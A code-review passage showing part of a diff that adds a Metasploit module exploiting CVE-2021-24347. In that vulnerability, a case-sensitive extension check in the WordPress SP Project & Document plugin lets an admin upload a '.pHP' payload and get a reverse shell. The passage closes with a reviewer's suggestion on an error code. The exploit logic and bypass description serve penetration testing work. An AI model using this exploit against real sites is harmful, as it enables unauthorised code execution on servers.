modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb

```diff
@@ -0,0 +1,138 @@
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
+          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
+          Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
+          making possible to upload `.pHP` files for instance.
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50115'],
+            ['CVE', '2021-24347']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress SP Project & Document < 1.6.0', {}]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-06-14',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    datastore['WPCHECK'] = true
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
+    end
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if cookie
+      check_plugin_version_from_readme('sp-client-document-manager', '4.22')
+    else
+      CheckCode::Unknown('The admin credentials given are wrong !')
+    end
+  end
+
+  def get_user_id(cookie)
+    r = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
+      'Referer' => full_uri('/wp-admin/users.php'),
+      'vars_get' => {
+        'page' => 'sp-client-document-manager-fileview'
+      }
+    })
+    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
+    user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
+    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless (user_id && user_id[1])
+    user_id[1]
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
```

Comment:
Using `Failure::NoAccess` would be more accurate here if it's an authentication error.

```suggestion
    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
```